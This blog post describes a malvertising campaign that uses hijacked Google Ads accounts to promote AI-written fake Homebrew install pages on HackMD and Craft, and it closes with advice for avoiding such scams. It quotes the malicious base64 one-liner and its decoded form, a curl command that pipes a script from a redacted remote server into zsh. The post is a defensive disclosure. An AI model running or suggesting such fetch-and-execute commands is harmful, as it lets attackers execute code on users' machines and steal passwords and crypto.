The AI-powered scam content army is here, and it's buying Google Ads.
I don't mean the usual SEO slop, like the "Top 10 Best Ways to Optimize Your Workflow in 2026" stuff that clutters every search result. I mean professionally generated, technically convincing pages designed to trick developers into running malware on their machines, funded by hijacked ad accounts from real businesses in multiple countries, and rotating across platforms faster than they can be reported.
Here's how I stumbled into one.
The Search
I was messing around with Claude's Chrome extension, and I happened to be in a fresh Chrome session with no extensions, no ad blocker, no customization. I needed to update some Homebrew packages, and since I was already in vanilla Chrome, I just Googled it: "brew upgrade packages."
The first result was sponsored. It pointed to HackMD, which is a real notes platform. I clicked it and got a page titled "Terminal-Based macOS Deployment." It immediately looked like clean AI slop- from formatting, tone, subsections about "System Advantages" and "Native Optimization." It even name-dropped Gatekeeper and SIP (actual macOS security features), as if this page was helping you stay secure.
The installation command gave it away:
echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNr...'|base64 -D|zsh
If you're not a developer, that's a bunch of gibberish. If you are, every alarm in your brain should fire. That's a base64-encoded string being decoded and piped directly into your shell. You literally cannot read what it does before you run it.
I decoded it. Here's what it actually says:
echo 'Installing package please wait...' && curl -kfsSL http://[malware-server]/curl/[hash]|zsh
It prints a friendly "Installing package please wait..." message, then silently downloads a script from a remote server and executes it immediately. The -kfsSL flags on curl suppress all output and ignore SSL certificate errors.
This is a textbook virus.
The Investigation
The HackMD account that published the page was called "mac specs" with the username @sXss8fsSQ62Kehf5H3lirw β random characters, obviously generated. Created February 19, 2026. Three days before I found it. No other published notes.
Google requires advertisers to verify their identity, and you can look up any advertiser in the Google Ads Transparency Center. The ad was paid for by Enexum SA, based in Chile.
My first thought was that it's a shell company. But I looked them up, and they're a real ad agency in Santiago. Their ad account had probably been hijacked.
I reported the ad to Google, and to HackMD. The next morning, I searched the same thing again.
I got a new sponsored result on a different platform, Craft.md. It was an identical page template, word for word.
This time, someone had managed to leave a comment on the Craft page:
"THIS IS A VIRUS, STEALS PASSWORDS AND CRYPTO"
I checked the Transparency Center again. This ad was paid for by GRUPO EON AMERICA S.A.S., based in Argentina. And when I looked them up, their Transparency Center page showed 28 active ads, most of them normal campaigns for an Argentine supermarket chain.
So it was the same pattern of a hijacked agency account, with verified identity inherited.
I emailed both companies to let them know their accounts were likely compromised.
What's Actually Happening Here
This is AI slop being trivially abused and it kinda shocks me how simple and brazen it is.
They used the right terminology, the right formatting, and the right tone to exploit the fact that developers are already primed to copy commands from the internet and paste them into their terminals. The scam doesn't need you to download a file or click a suspicious link, but just to do the thing you were already going to do.
What You Should Do
Stop using sponsored search results. Just don't click them. The real documentation will always rank organically. Better yet, use a search engine that doesn't show sponsored results at all. I use Kagi, which is paid and ad-free. If I'd been in my normal setup instead of a bare Chrome session, I never would have seen this ad in the first place.
Learn what AI-generated scam content looks like. It has a samey quality: overly polished, generically professional, and weirdly confident about everything. Phrases like "Professional-grade installation via Terminal ensures a direct, high-speed integration with the macOS architecture" sound impressive but say nothing. Real documentation doesn't talk like that. If a technical guide reads like a marketing brochure, be suspicious.
Stick to real sources. When you're looking for how to use a CLI tool, go to the official docs. For Homebrew, that's brew.sh. If the source is a content-hosting platform rather than the project's own documentation, ask yourself why.
Check the comments. If you do end up on a platform that allows comments, look at them. Sometimes the best security advisory is the bluntest one.
Never run base64-encoded commands from the internet. If someone is hiding what a command does, there's a reason.
Stay skeptical out there.
After publishing this, I looked into whether anyone else had documented the same thing. It turns out this is a well-known, ongoing campaign that the security community has been tracking for over a year.
In January 2025, BleepingComputer reported on fake Homebrew Google Ads that redirected from the real "brew.sh" URL to a lookalike domain "brewe.sh." Homebrew's project leader responded publicly, essentially saying there was nothing they could do and that Google keeps taking money from scammers.
By October 2025, researchers had identified over 85 domains impersonating Homebrew, LogMeIn, and TradingView, all using the same base64 technique through Google Ads.
And just this month, the campaign expanded to abusing AI platforms directly. AdGuard documented attackers creating public artifacts on claude.ai with fake Homebrew install instructions, then buying Google Ads pointing to them. Because the ad shows the trusted claude.ai domain, users are even more likely to click. BleepingComputer confirmed the campaign also uses fake Apple Support pages on Medium, and that over 15,000 users viewed the malicious content. The search queries being targeted go beyond Homebrew to include "online DNS resolver" and "macOS CLI disk space analyzer."
So the HackMD and Craft pages I found are one arm of a much larger operation. The security community calls the technique "ClickFix"... and it's not slowing down.
Top comments (0)